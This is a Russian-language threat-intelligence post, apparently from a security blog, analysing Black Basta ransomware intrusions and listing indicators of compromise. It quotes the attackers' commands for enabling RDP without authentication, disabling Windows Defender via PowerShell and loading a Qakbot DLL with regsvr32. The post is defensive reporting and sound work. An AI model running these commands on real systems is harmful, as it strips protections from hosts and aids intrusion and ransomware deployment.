Black Basta APT IOCs

security IOC
Опубликовано

Black Basta - группа разработчиков вымогательского ПО, появившаяся недавно: первые публичные сообщения об атаках появились в апреле этого года.

Black Basta APT

Боковое перемещение

Как и другие группы вымогателей, Black Basta использует атаки с двойным вымогательством, при которых данные сначала удаляются из сети, а затем запускается программа-вымогатель. Затем злоумышленник угрожает утечкой данных на Tor-сайте "Black Basta Blog" или "Basta News". Black Basta использует два Tor-сайта: один - для утечки украденных данных, а другой - для связи с операторами выкупной программы. Последний сайт указан в записке о выкупе, которая передается исполняемым файлом программы.

Black Basta был замечен за использованием следующих методов для бокового перемещения по сети после получения первоначального доступа:

PsExec.exe, который был создан в папке C:\Windows\.
Qakbot использовался для удаленного создания временной службы на целевом узле, которая была настроена на выполнение DLL Qakbot с помощью regsvr32.exe:
regsvr32.exe -s \\\<IP адрес взломанного контроллера домена>\SYSVOL\<случайная строка>.dll

RDP вместе с развертыванием пакетного файла rdp.bat, который содержал командные строки для включения RDP-логинов. Это использовалось для того, чтобы агент угрозы мог устанавливать сеансы удаленного рабочего стола на взломанных узлах, даже если RDP был изначально отключен:

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
net start MpsSvc
netsh advfirewall firewall set rule group="Remote Desktop" new enable=yes
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "UserAuthentication" /t REG_DWORD /d 0 /f

Уклонение от защиты

Во время вторжения угрожающий агент предпринял шаги, чтобы предотвратить вмешательство антивируса. Было замечено, что угрожающий агент использовал две основные техники для отключения Windows Defender.

Первый использовал пакетный сценарий d.bat, который был развернут локально на взломанных узлах и выполнял следующие команды PowerShell:

powershell -ExecutionPolicy Bypass -command "New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force"
powershell -ExecutionPolicy Bypass -command "Set-MpPreference -DisableRealtimeMonitoring 1"
powershell -ExecutionPolicy Bypass Uninstall-WindowsFeature -Name Windows-Defender

Вторая техника включает создание GPO (объекта групповой политики) на взломанном контроллере домена, который будет вносить следующие изменения в реестр Windows на узлах, подключенных к домену.

Обнаружение

Текстовый файл в папке C:\Windows\ под названием pc_list.txt присутствовал на двух взломанных контроллерах домена, оба содержали список внутренних IP-адресов всех систем в сети. Это было сделано для того, чтобы предоставить агенту угрозы список IP-адресов для установки вымогательского ПО.
Командование и контроль

Qakbot был основным методом, используемым угрожающим субъектом для поддержания своего присутствия в сети. Угрожающий агент также был замечен в использовании маячков Cobalt Strike во время компрометации.

Воздействие

Перед развертыванием программы-выкупа угроза создала RDP-сессии на серверах Hyper-V и оттуда изменила конфигурацию заданий резервного копирования Veeam и удалила резервные копии размещенных виртуальных машин.

На одном из взломанных контроллеров домена была обнаружена закодированная команда PowerShell, при расшифровке которой был получен сценарий Invoke-TotalExec, обеспечивающий возможность распространения и выполнения файлов по сети с помощью WMI (Windows Management Instrumentation). Судя по всему, скрипт был запущен для распространения двоичного файла ransomware по IP-адресам, содержащимся в файле C:\Windows\pc_list.txt. Анализ сценария показывает, что создаются два файла журнала:

C:\Windows\Temp\log.info - Содержит записи журнала для успешных попыток.
C:\Windows\Temp\log.dat - Содержит записи о неудачных попытках.

Файл журнала содержал записи о неудачных загрузках для всех IP-адресов из pc_list.txt, указывая на то, что угрожающий агент пытался развернуть исполняемый файл ransomware на всех хостах сети, однако это не удалось. Несмотря на это, программа-вымогатель все равно была развернута на серверах Hyper-V и контроллерах домена.

Indicators of Compromise

IPv4

23.106.160.188

SHA1

  • eb43350337138f2a77593c79cee1439217d02957
  • 920fe42b1bd69804080f904f0426ed784a8ebbc2

Filenames

  • C:\Windows\PsExec.exe
  • C:\Windows\SYSVOL\sysvol\<random string>.dll
  • C:\Windows\Temp\log.info C:\Windows\Temp\log.dat
Похожие записи:
  1. BlackBasta Ransomware IOCs - Part 4
  2. Void Balaur APT IOCs
  3. Scarlet Mimic APT IOCs
  4. Metador APT IOCs
  5. Fancy Bear (APT28) APT IOCs - Part 2
APT Black Basta
Добавить комментарий